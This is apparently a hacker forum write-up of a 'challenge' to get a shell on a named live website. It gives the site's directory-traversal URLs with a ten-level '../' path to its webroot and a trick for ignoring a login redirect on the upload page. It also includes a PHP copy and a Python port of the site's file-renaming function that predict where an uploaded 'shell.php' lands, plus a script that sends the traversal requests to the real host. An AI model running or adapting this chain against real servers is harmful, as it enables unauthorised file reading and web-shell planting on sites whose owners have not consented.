- So the challenge was to shell the site.
- It was vulnerable to directory traversal. Some people thought it was LFI and were trying things like the php:// wrappers, but the script reads and displays the requested file rather than including it, so wrappers get you nowhere. Anyway..
- Here is the vulnerable parameter ~ http://www.vepr.info/zobraz_pohadku.php?pohadka=baron.txt
- Here's the full path (from the screenshot) ~ http://prntscr.com/86fm87
- After crawling through the site we find /upload.php, but going there redirects us to "http://www.vepr.info/login.php?act=2&reason=99"
- That's not a big deal: we can bypass it with the NoRedirect extension, which just makes the browser ignore the Location header. That only helps because upload.php sends the redirect but keeps running and still emits the page (quick check: request it with curl without -L and you get a 302 with a non-empty body). Let's read the file first..
- http://www.vepr.info/zobraz_pohadku.php?pohadka=../../../../../../../../../../d1/www/domain/vepr.info/www/upload.php ~ http://prntscr.com/86fnk3
- Reading upload.php we see a require() that pulls in the helper functions, so let's read 'includes/func.php'
- http://www.vepr.info/zobraz_pohadku.php?pohadka=../../../../../../../../../../d1/www/domain/vepr.info/www/includes/func.php ~ http://prntscr.com/86fpby
- Reading that we see dwn_name(): it takes the 'name' (your file name), strips the directory part, splits off the extension at the last dot and returns <base>_[<7 digits of the Unix timestamp>].<ext>. The 7 digits are substr(time(),1,7), i.e. the first digit and the last two digits of time() are dropped, so the bracketed number only changes every 100 seconds. That is why you run the helper right after the upload, and if you miss the window you try the neighbouring value (+1 / -1).
- So we just reuse that function ourselves, like this: http://prntscr.com/86fwcz ~ save this somewhere, we'll use it later..
- ----
<?php
// Copy of dwn_name() from includes/func.php on the target: it renames every
// upload to <base>_[<7 digits of time()>].<ext>. Run it right after the upload
// succeeds, because substr(time(),1,7) drops the first digit and the last two
// digits of the Unix timestamp, so the bracketed number changes every 100 s.
function dwn_name($name){
    $oldname=basename($name);          // strip any directory part
    $i=0;
    // walk backwards from the end to the last "." to get the extension length
    while((substr($oldname,-$i-1,1)!=".")&&($i<strlen($oldname)))
        $i++;
    $ext=substr($oldname,-$i,$i);                      // extension without the dot
    $base=substr($oldname,0,strlen($oldname)-$i-1);    // name before the last dot
    return $base."_[".substr(time(),1,7)."].".$ext;
}
// name of the file you uploaded, e.g. ?shell=shell.php via the web server;
// the argv fallback is an addition so the script also runs from the CLI
$x = $_REQUEST['shell'] ?? ($argv[1] ?? 'shell.php');
echo dwn_name($x), "\n";
?>
- ----
- Now let's go to upload.php, but first add /login.php to NoRedirect's filter list ~ http://prntscr.com/86fss8
- OK, let's go ~ http://prntscr.com/86fxmz ~ as soon as you get this message http://prntscr.com/86fwu3
- run the PHP I told you to save, and you'll get something like this. http://prntscr.com/86fx3t
- Ta-Da! ~ http://prntscr.com/86fx9k
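- The same chain as an added Python helper (my code, not part of the original paste or of the site): it builds the traversal request for a file under the webroot, fetches it without following the redirect (what NoRedirect does in the browser), ports the site's dwn_name() so the stored filename can be predicted, and enumerates the neighbouring values in case the 100-second window was missed. It assumes the host, the ten "../" and the webroot path exactly as they appear in the paste; the upload form's field names are not shown in the paste, so the upload itself is left to the browser; "shell.php" and the timestamps in the usage are constructed sample values.

```python
#!/usr/bin/env python3
"""Added helper for the write-up above; not code from the original paste or the site.

It scripts the two parts that are easy to get wrong by hand:
  1. reading a file through the pohadka traversal WITHOUT following redirects
     (http.client never follows a Location header, so a 302 that still carries
     a body is returned as-is, the same view the NoRedirect extension gives you);
  2. predicting the stored filename with a port of the site's dwn_name(), plus
     the neighbouring values in case the 100-second window was missed.
The upload form's field names are not in the paste, so the upload itself is
left to the browser.
"""
import http.client
import posixpath
import time
from urllib.parse import quote

HOST = "www.vepr.info"                       # target from the paste
READER = "/zobraz_pohadku.php?pohadka="      # traversal parameter from the paste
DEPTH = 10                                   # ten "../" were enough in the paste
WEBROOT = "d1/www/domain/vepr.info/www"      # full path from the paste (assumed unchanged)


def traversal_path(target):
    """Request path that reads <webroot>/<target> through the traversal."""
    return READER + quote("../" * DEPTH + WEBROOT + "/" + target, safe="/")


def fetch_no_redirect(path, host=HOST):
    """GET a path and return (status, Location header, body) without following 3xx.

    Network call; not exercised offline. A 302 whose body still contains the
    upload form is the sign that the login redirect can simply be ignored.
    """
    conn = http.client.HTTPConnection(host, 80, timeout=15)
    conn.request("GET", path, headers={"Host": host})
    resp = conn.getresponse()
    body = resp.read()
    conn.close()
    return resp.status, resp.getheader("Location"), body


def dwn_name(name, now):
    """Python port of dwn_name() from includes/func.php, faithful to PHP substr().

    `now` is the Unix time (int) at which the server ran the function.
    """
    oldname = posixpath.basename(name)       # PHP basename(): drop the directory part
    n = len(oldname)
    i = 0
    while i < n and oldname[n - i - 1] != ".":   # i = length of the extension
        i += 1
    ext = oldname[n - i:]                    # substr($oldname,-$i,$i)
    base = oldname[:n - i - 1]               # substr($oldname,0,strlen-$i-1); length -1 when there is no dot
    stamp = str(now)[1:8]                    # substr(time(),1,7): digits 2..8 of time()
    return "%s_[%s].%s" % (base, stamp, ext)


def candidate_names(name, upload_time, slack=1):
    """Stored names for an upload made at about `upload_time`.

    The stamp is time() with its first and last two digits dropped, so it only
    changes every 100 s; `slack` steps of 100 s either side cover a missed window.
    """
    seen = []
    for step in range(-slack, slack + 1):
        cand = dwn_name(name, upload_time + 100 * step)
        if cand not in seen:
            seen.append(cand)
    return seen


if __name__ == "__main__":
    # constructed sample usage; the real timestamp is the moment the upload succeeded
    print("read upload.php via:", traversal_path("upload.php"))
    for cand in candidate_names("shell.php", int(time.time())):
        print("try:", cand)
```

- The port keeps the PHP quirks on purpose: a name without a dot loses its last character and gets the whole name as "extension" (dwn_name("shell", ...) gives "shel_[...].shell"), which is what the server would store too.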
- pl0x forgive me if there's any mistake ,_, dunt make fon of meh or i'll crie, i'll crie hurd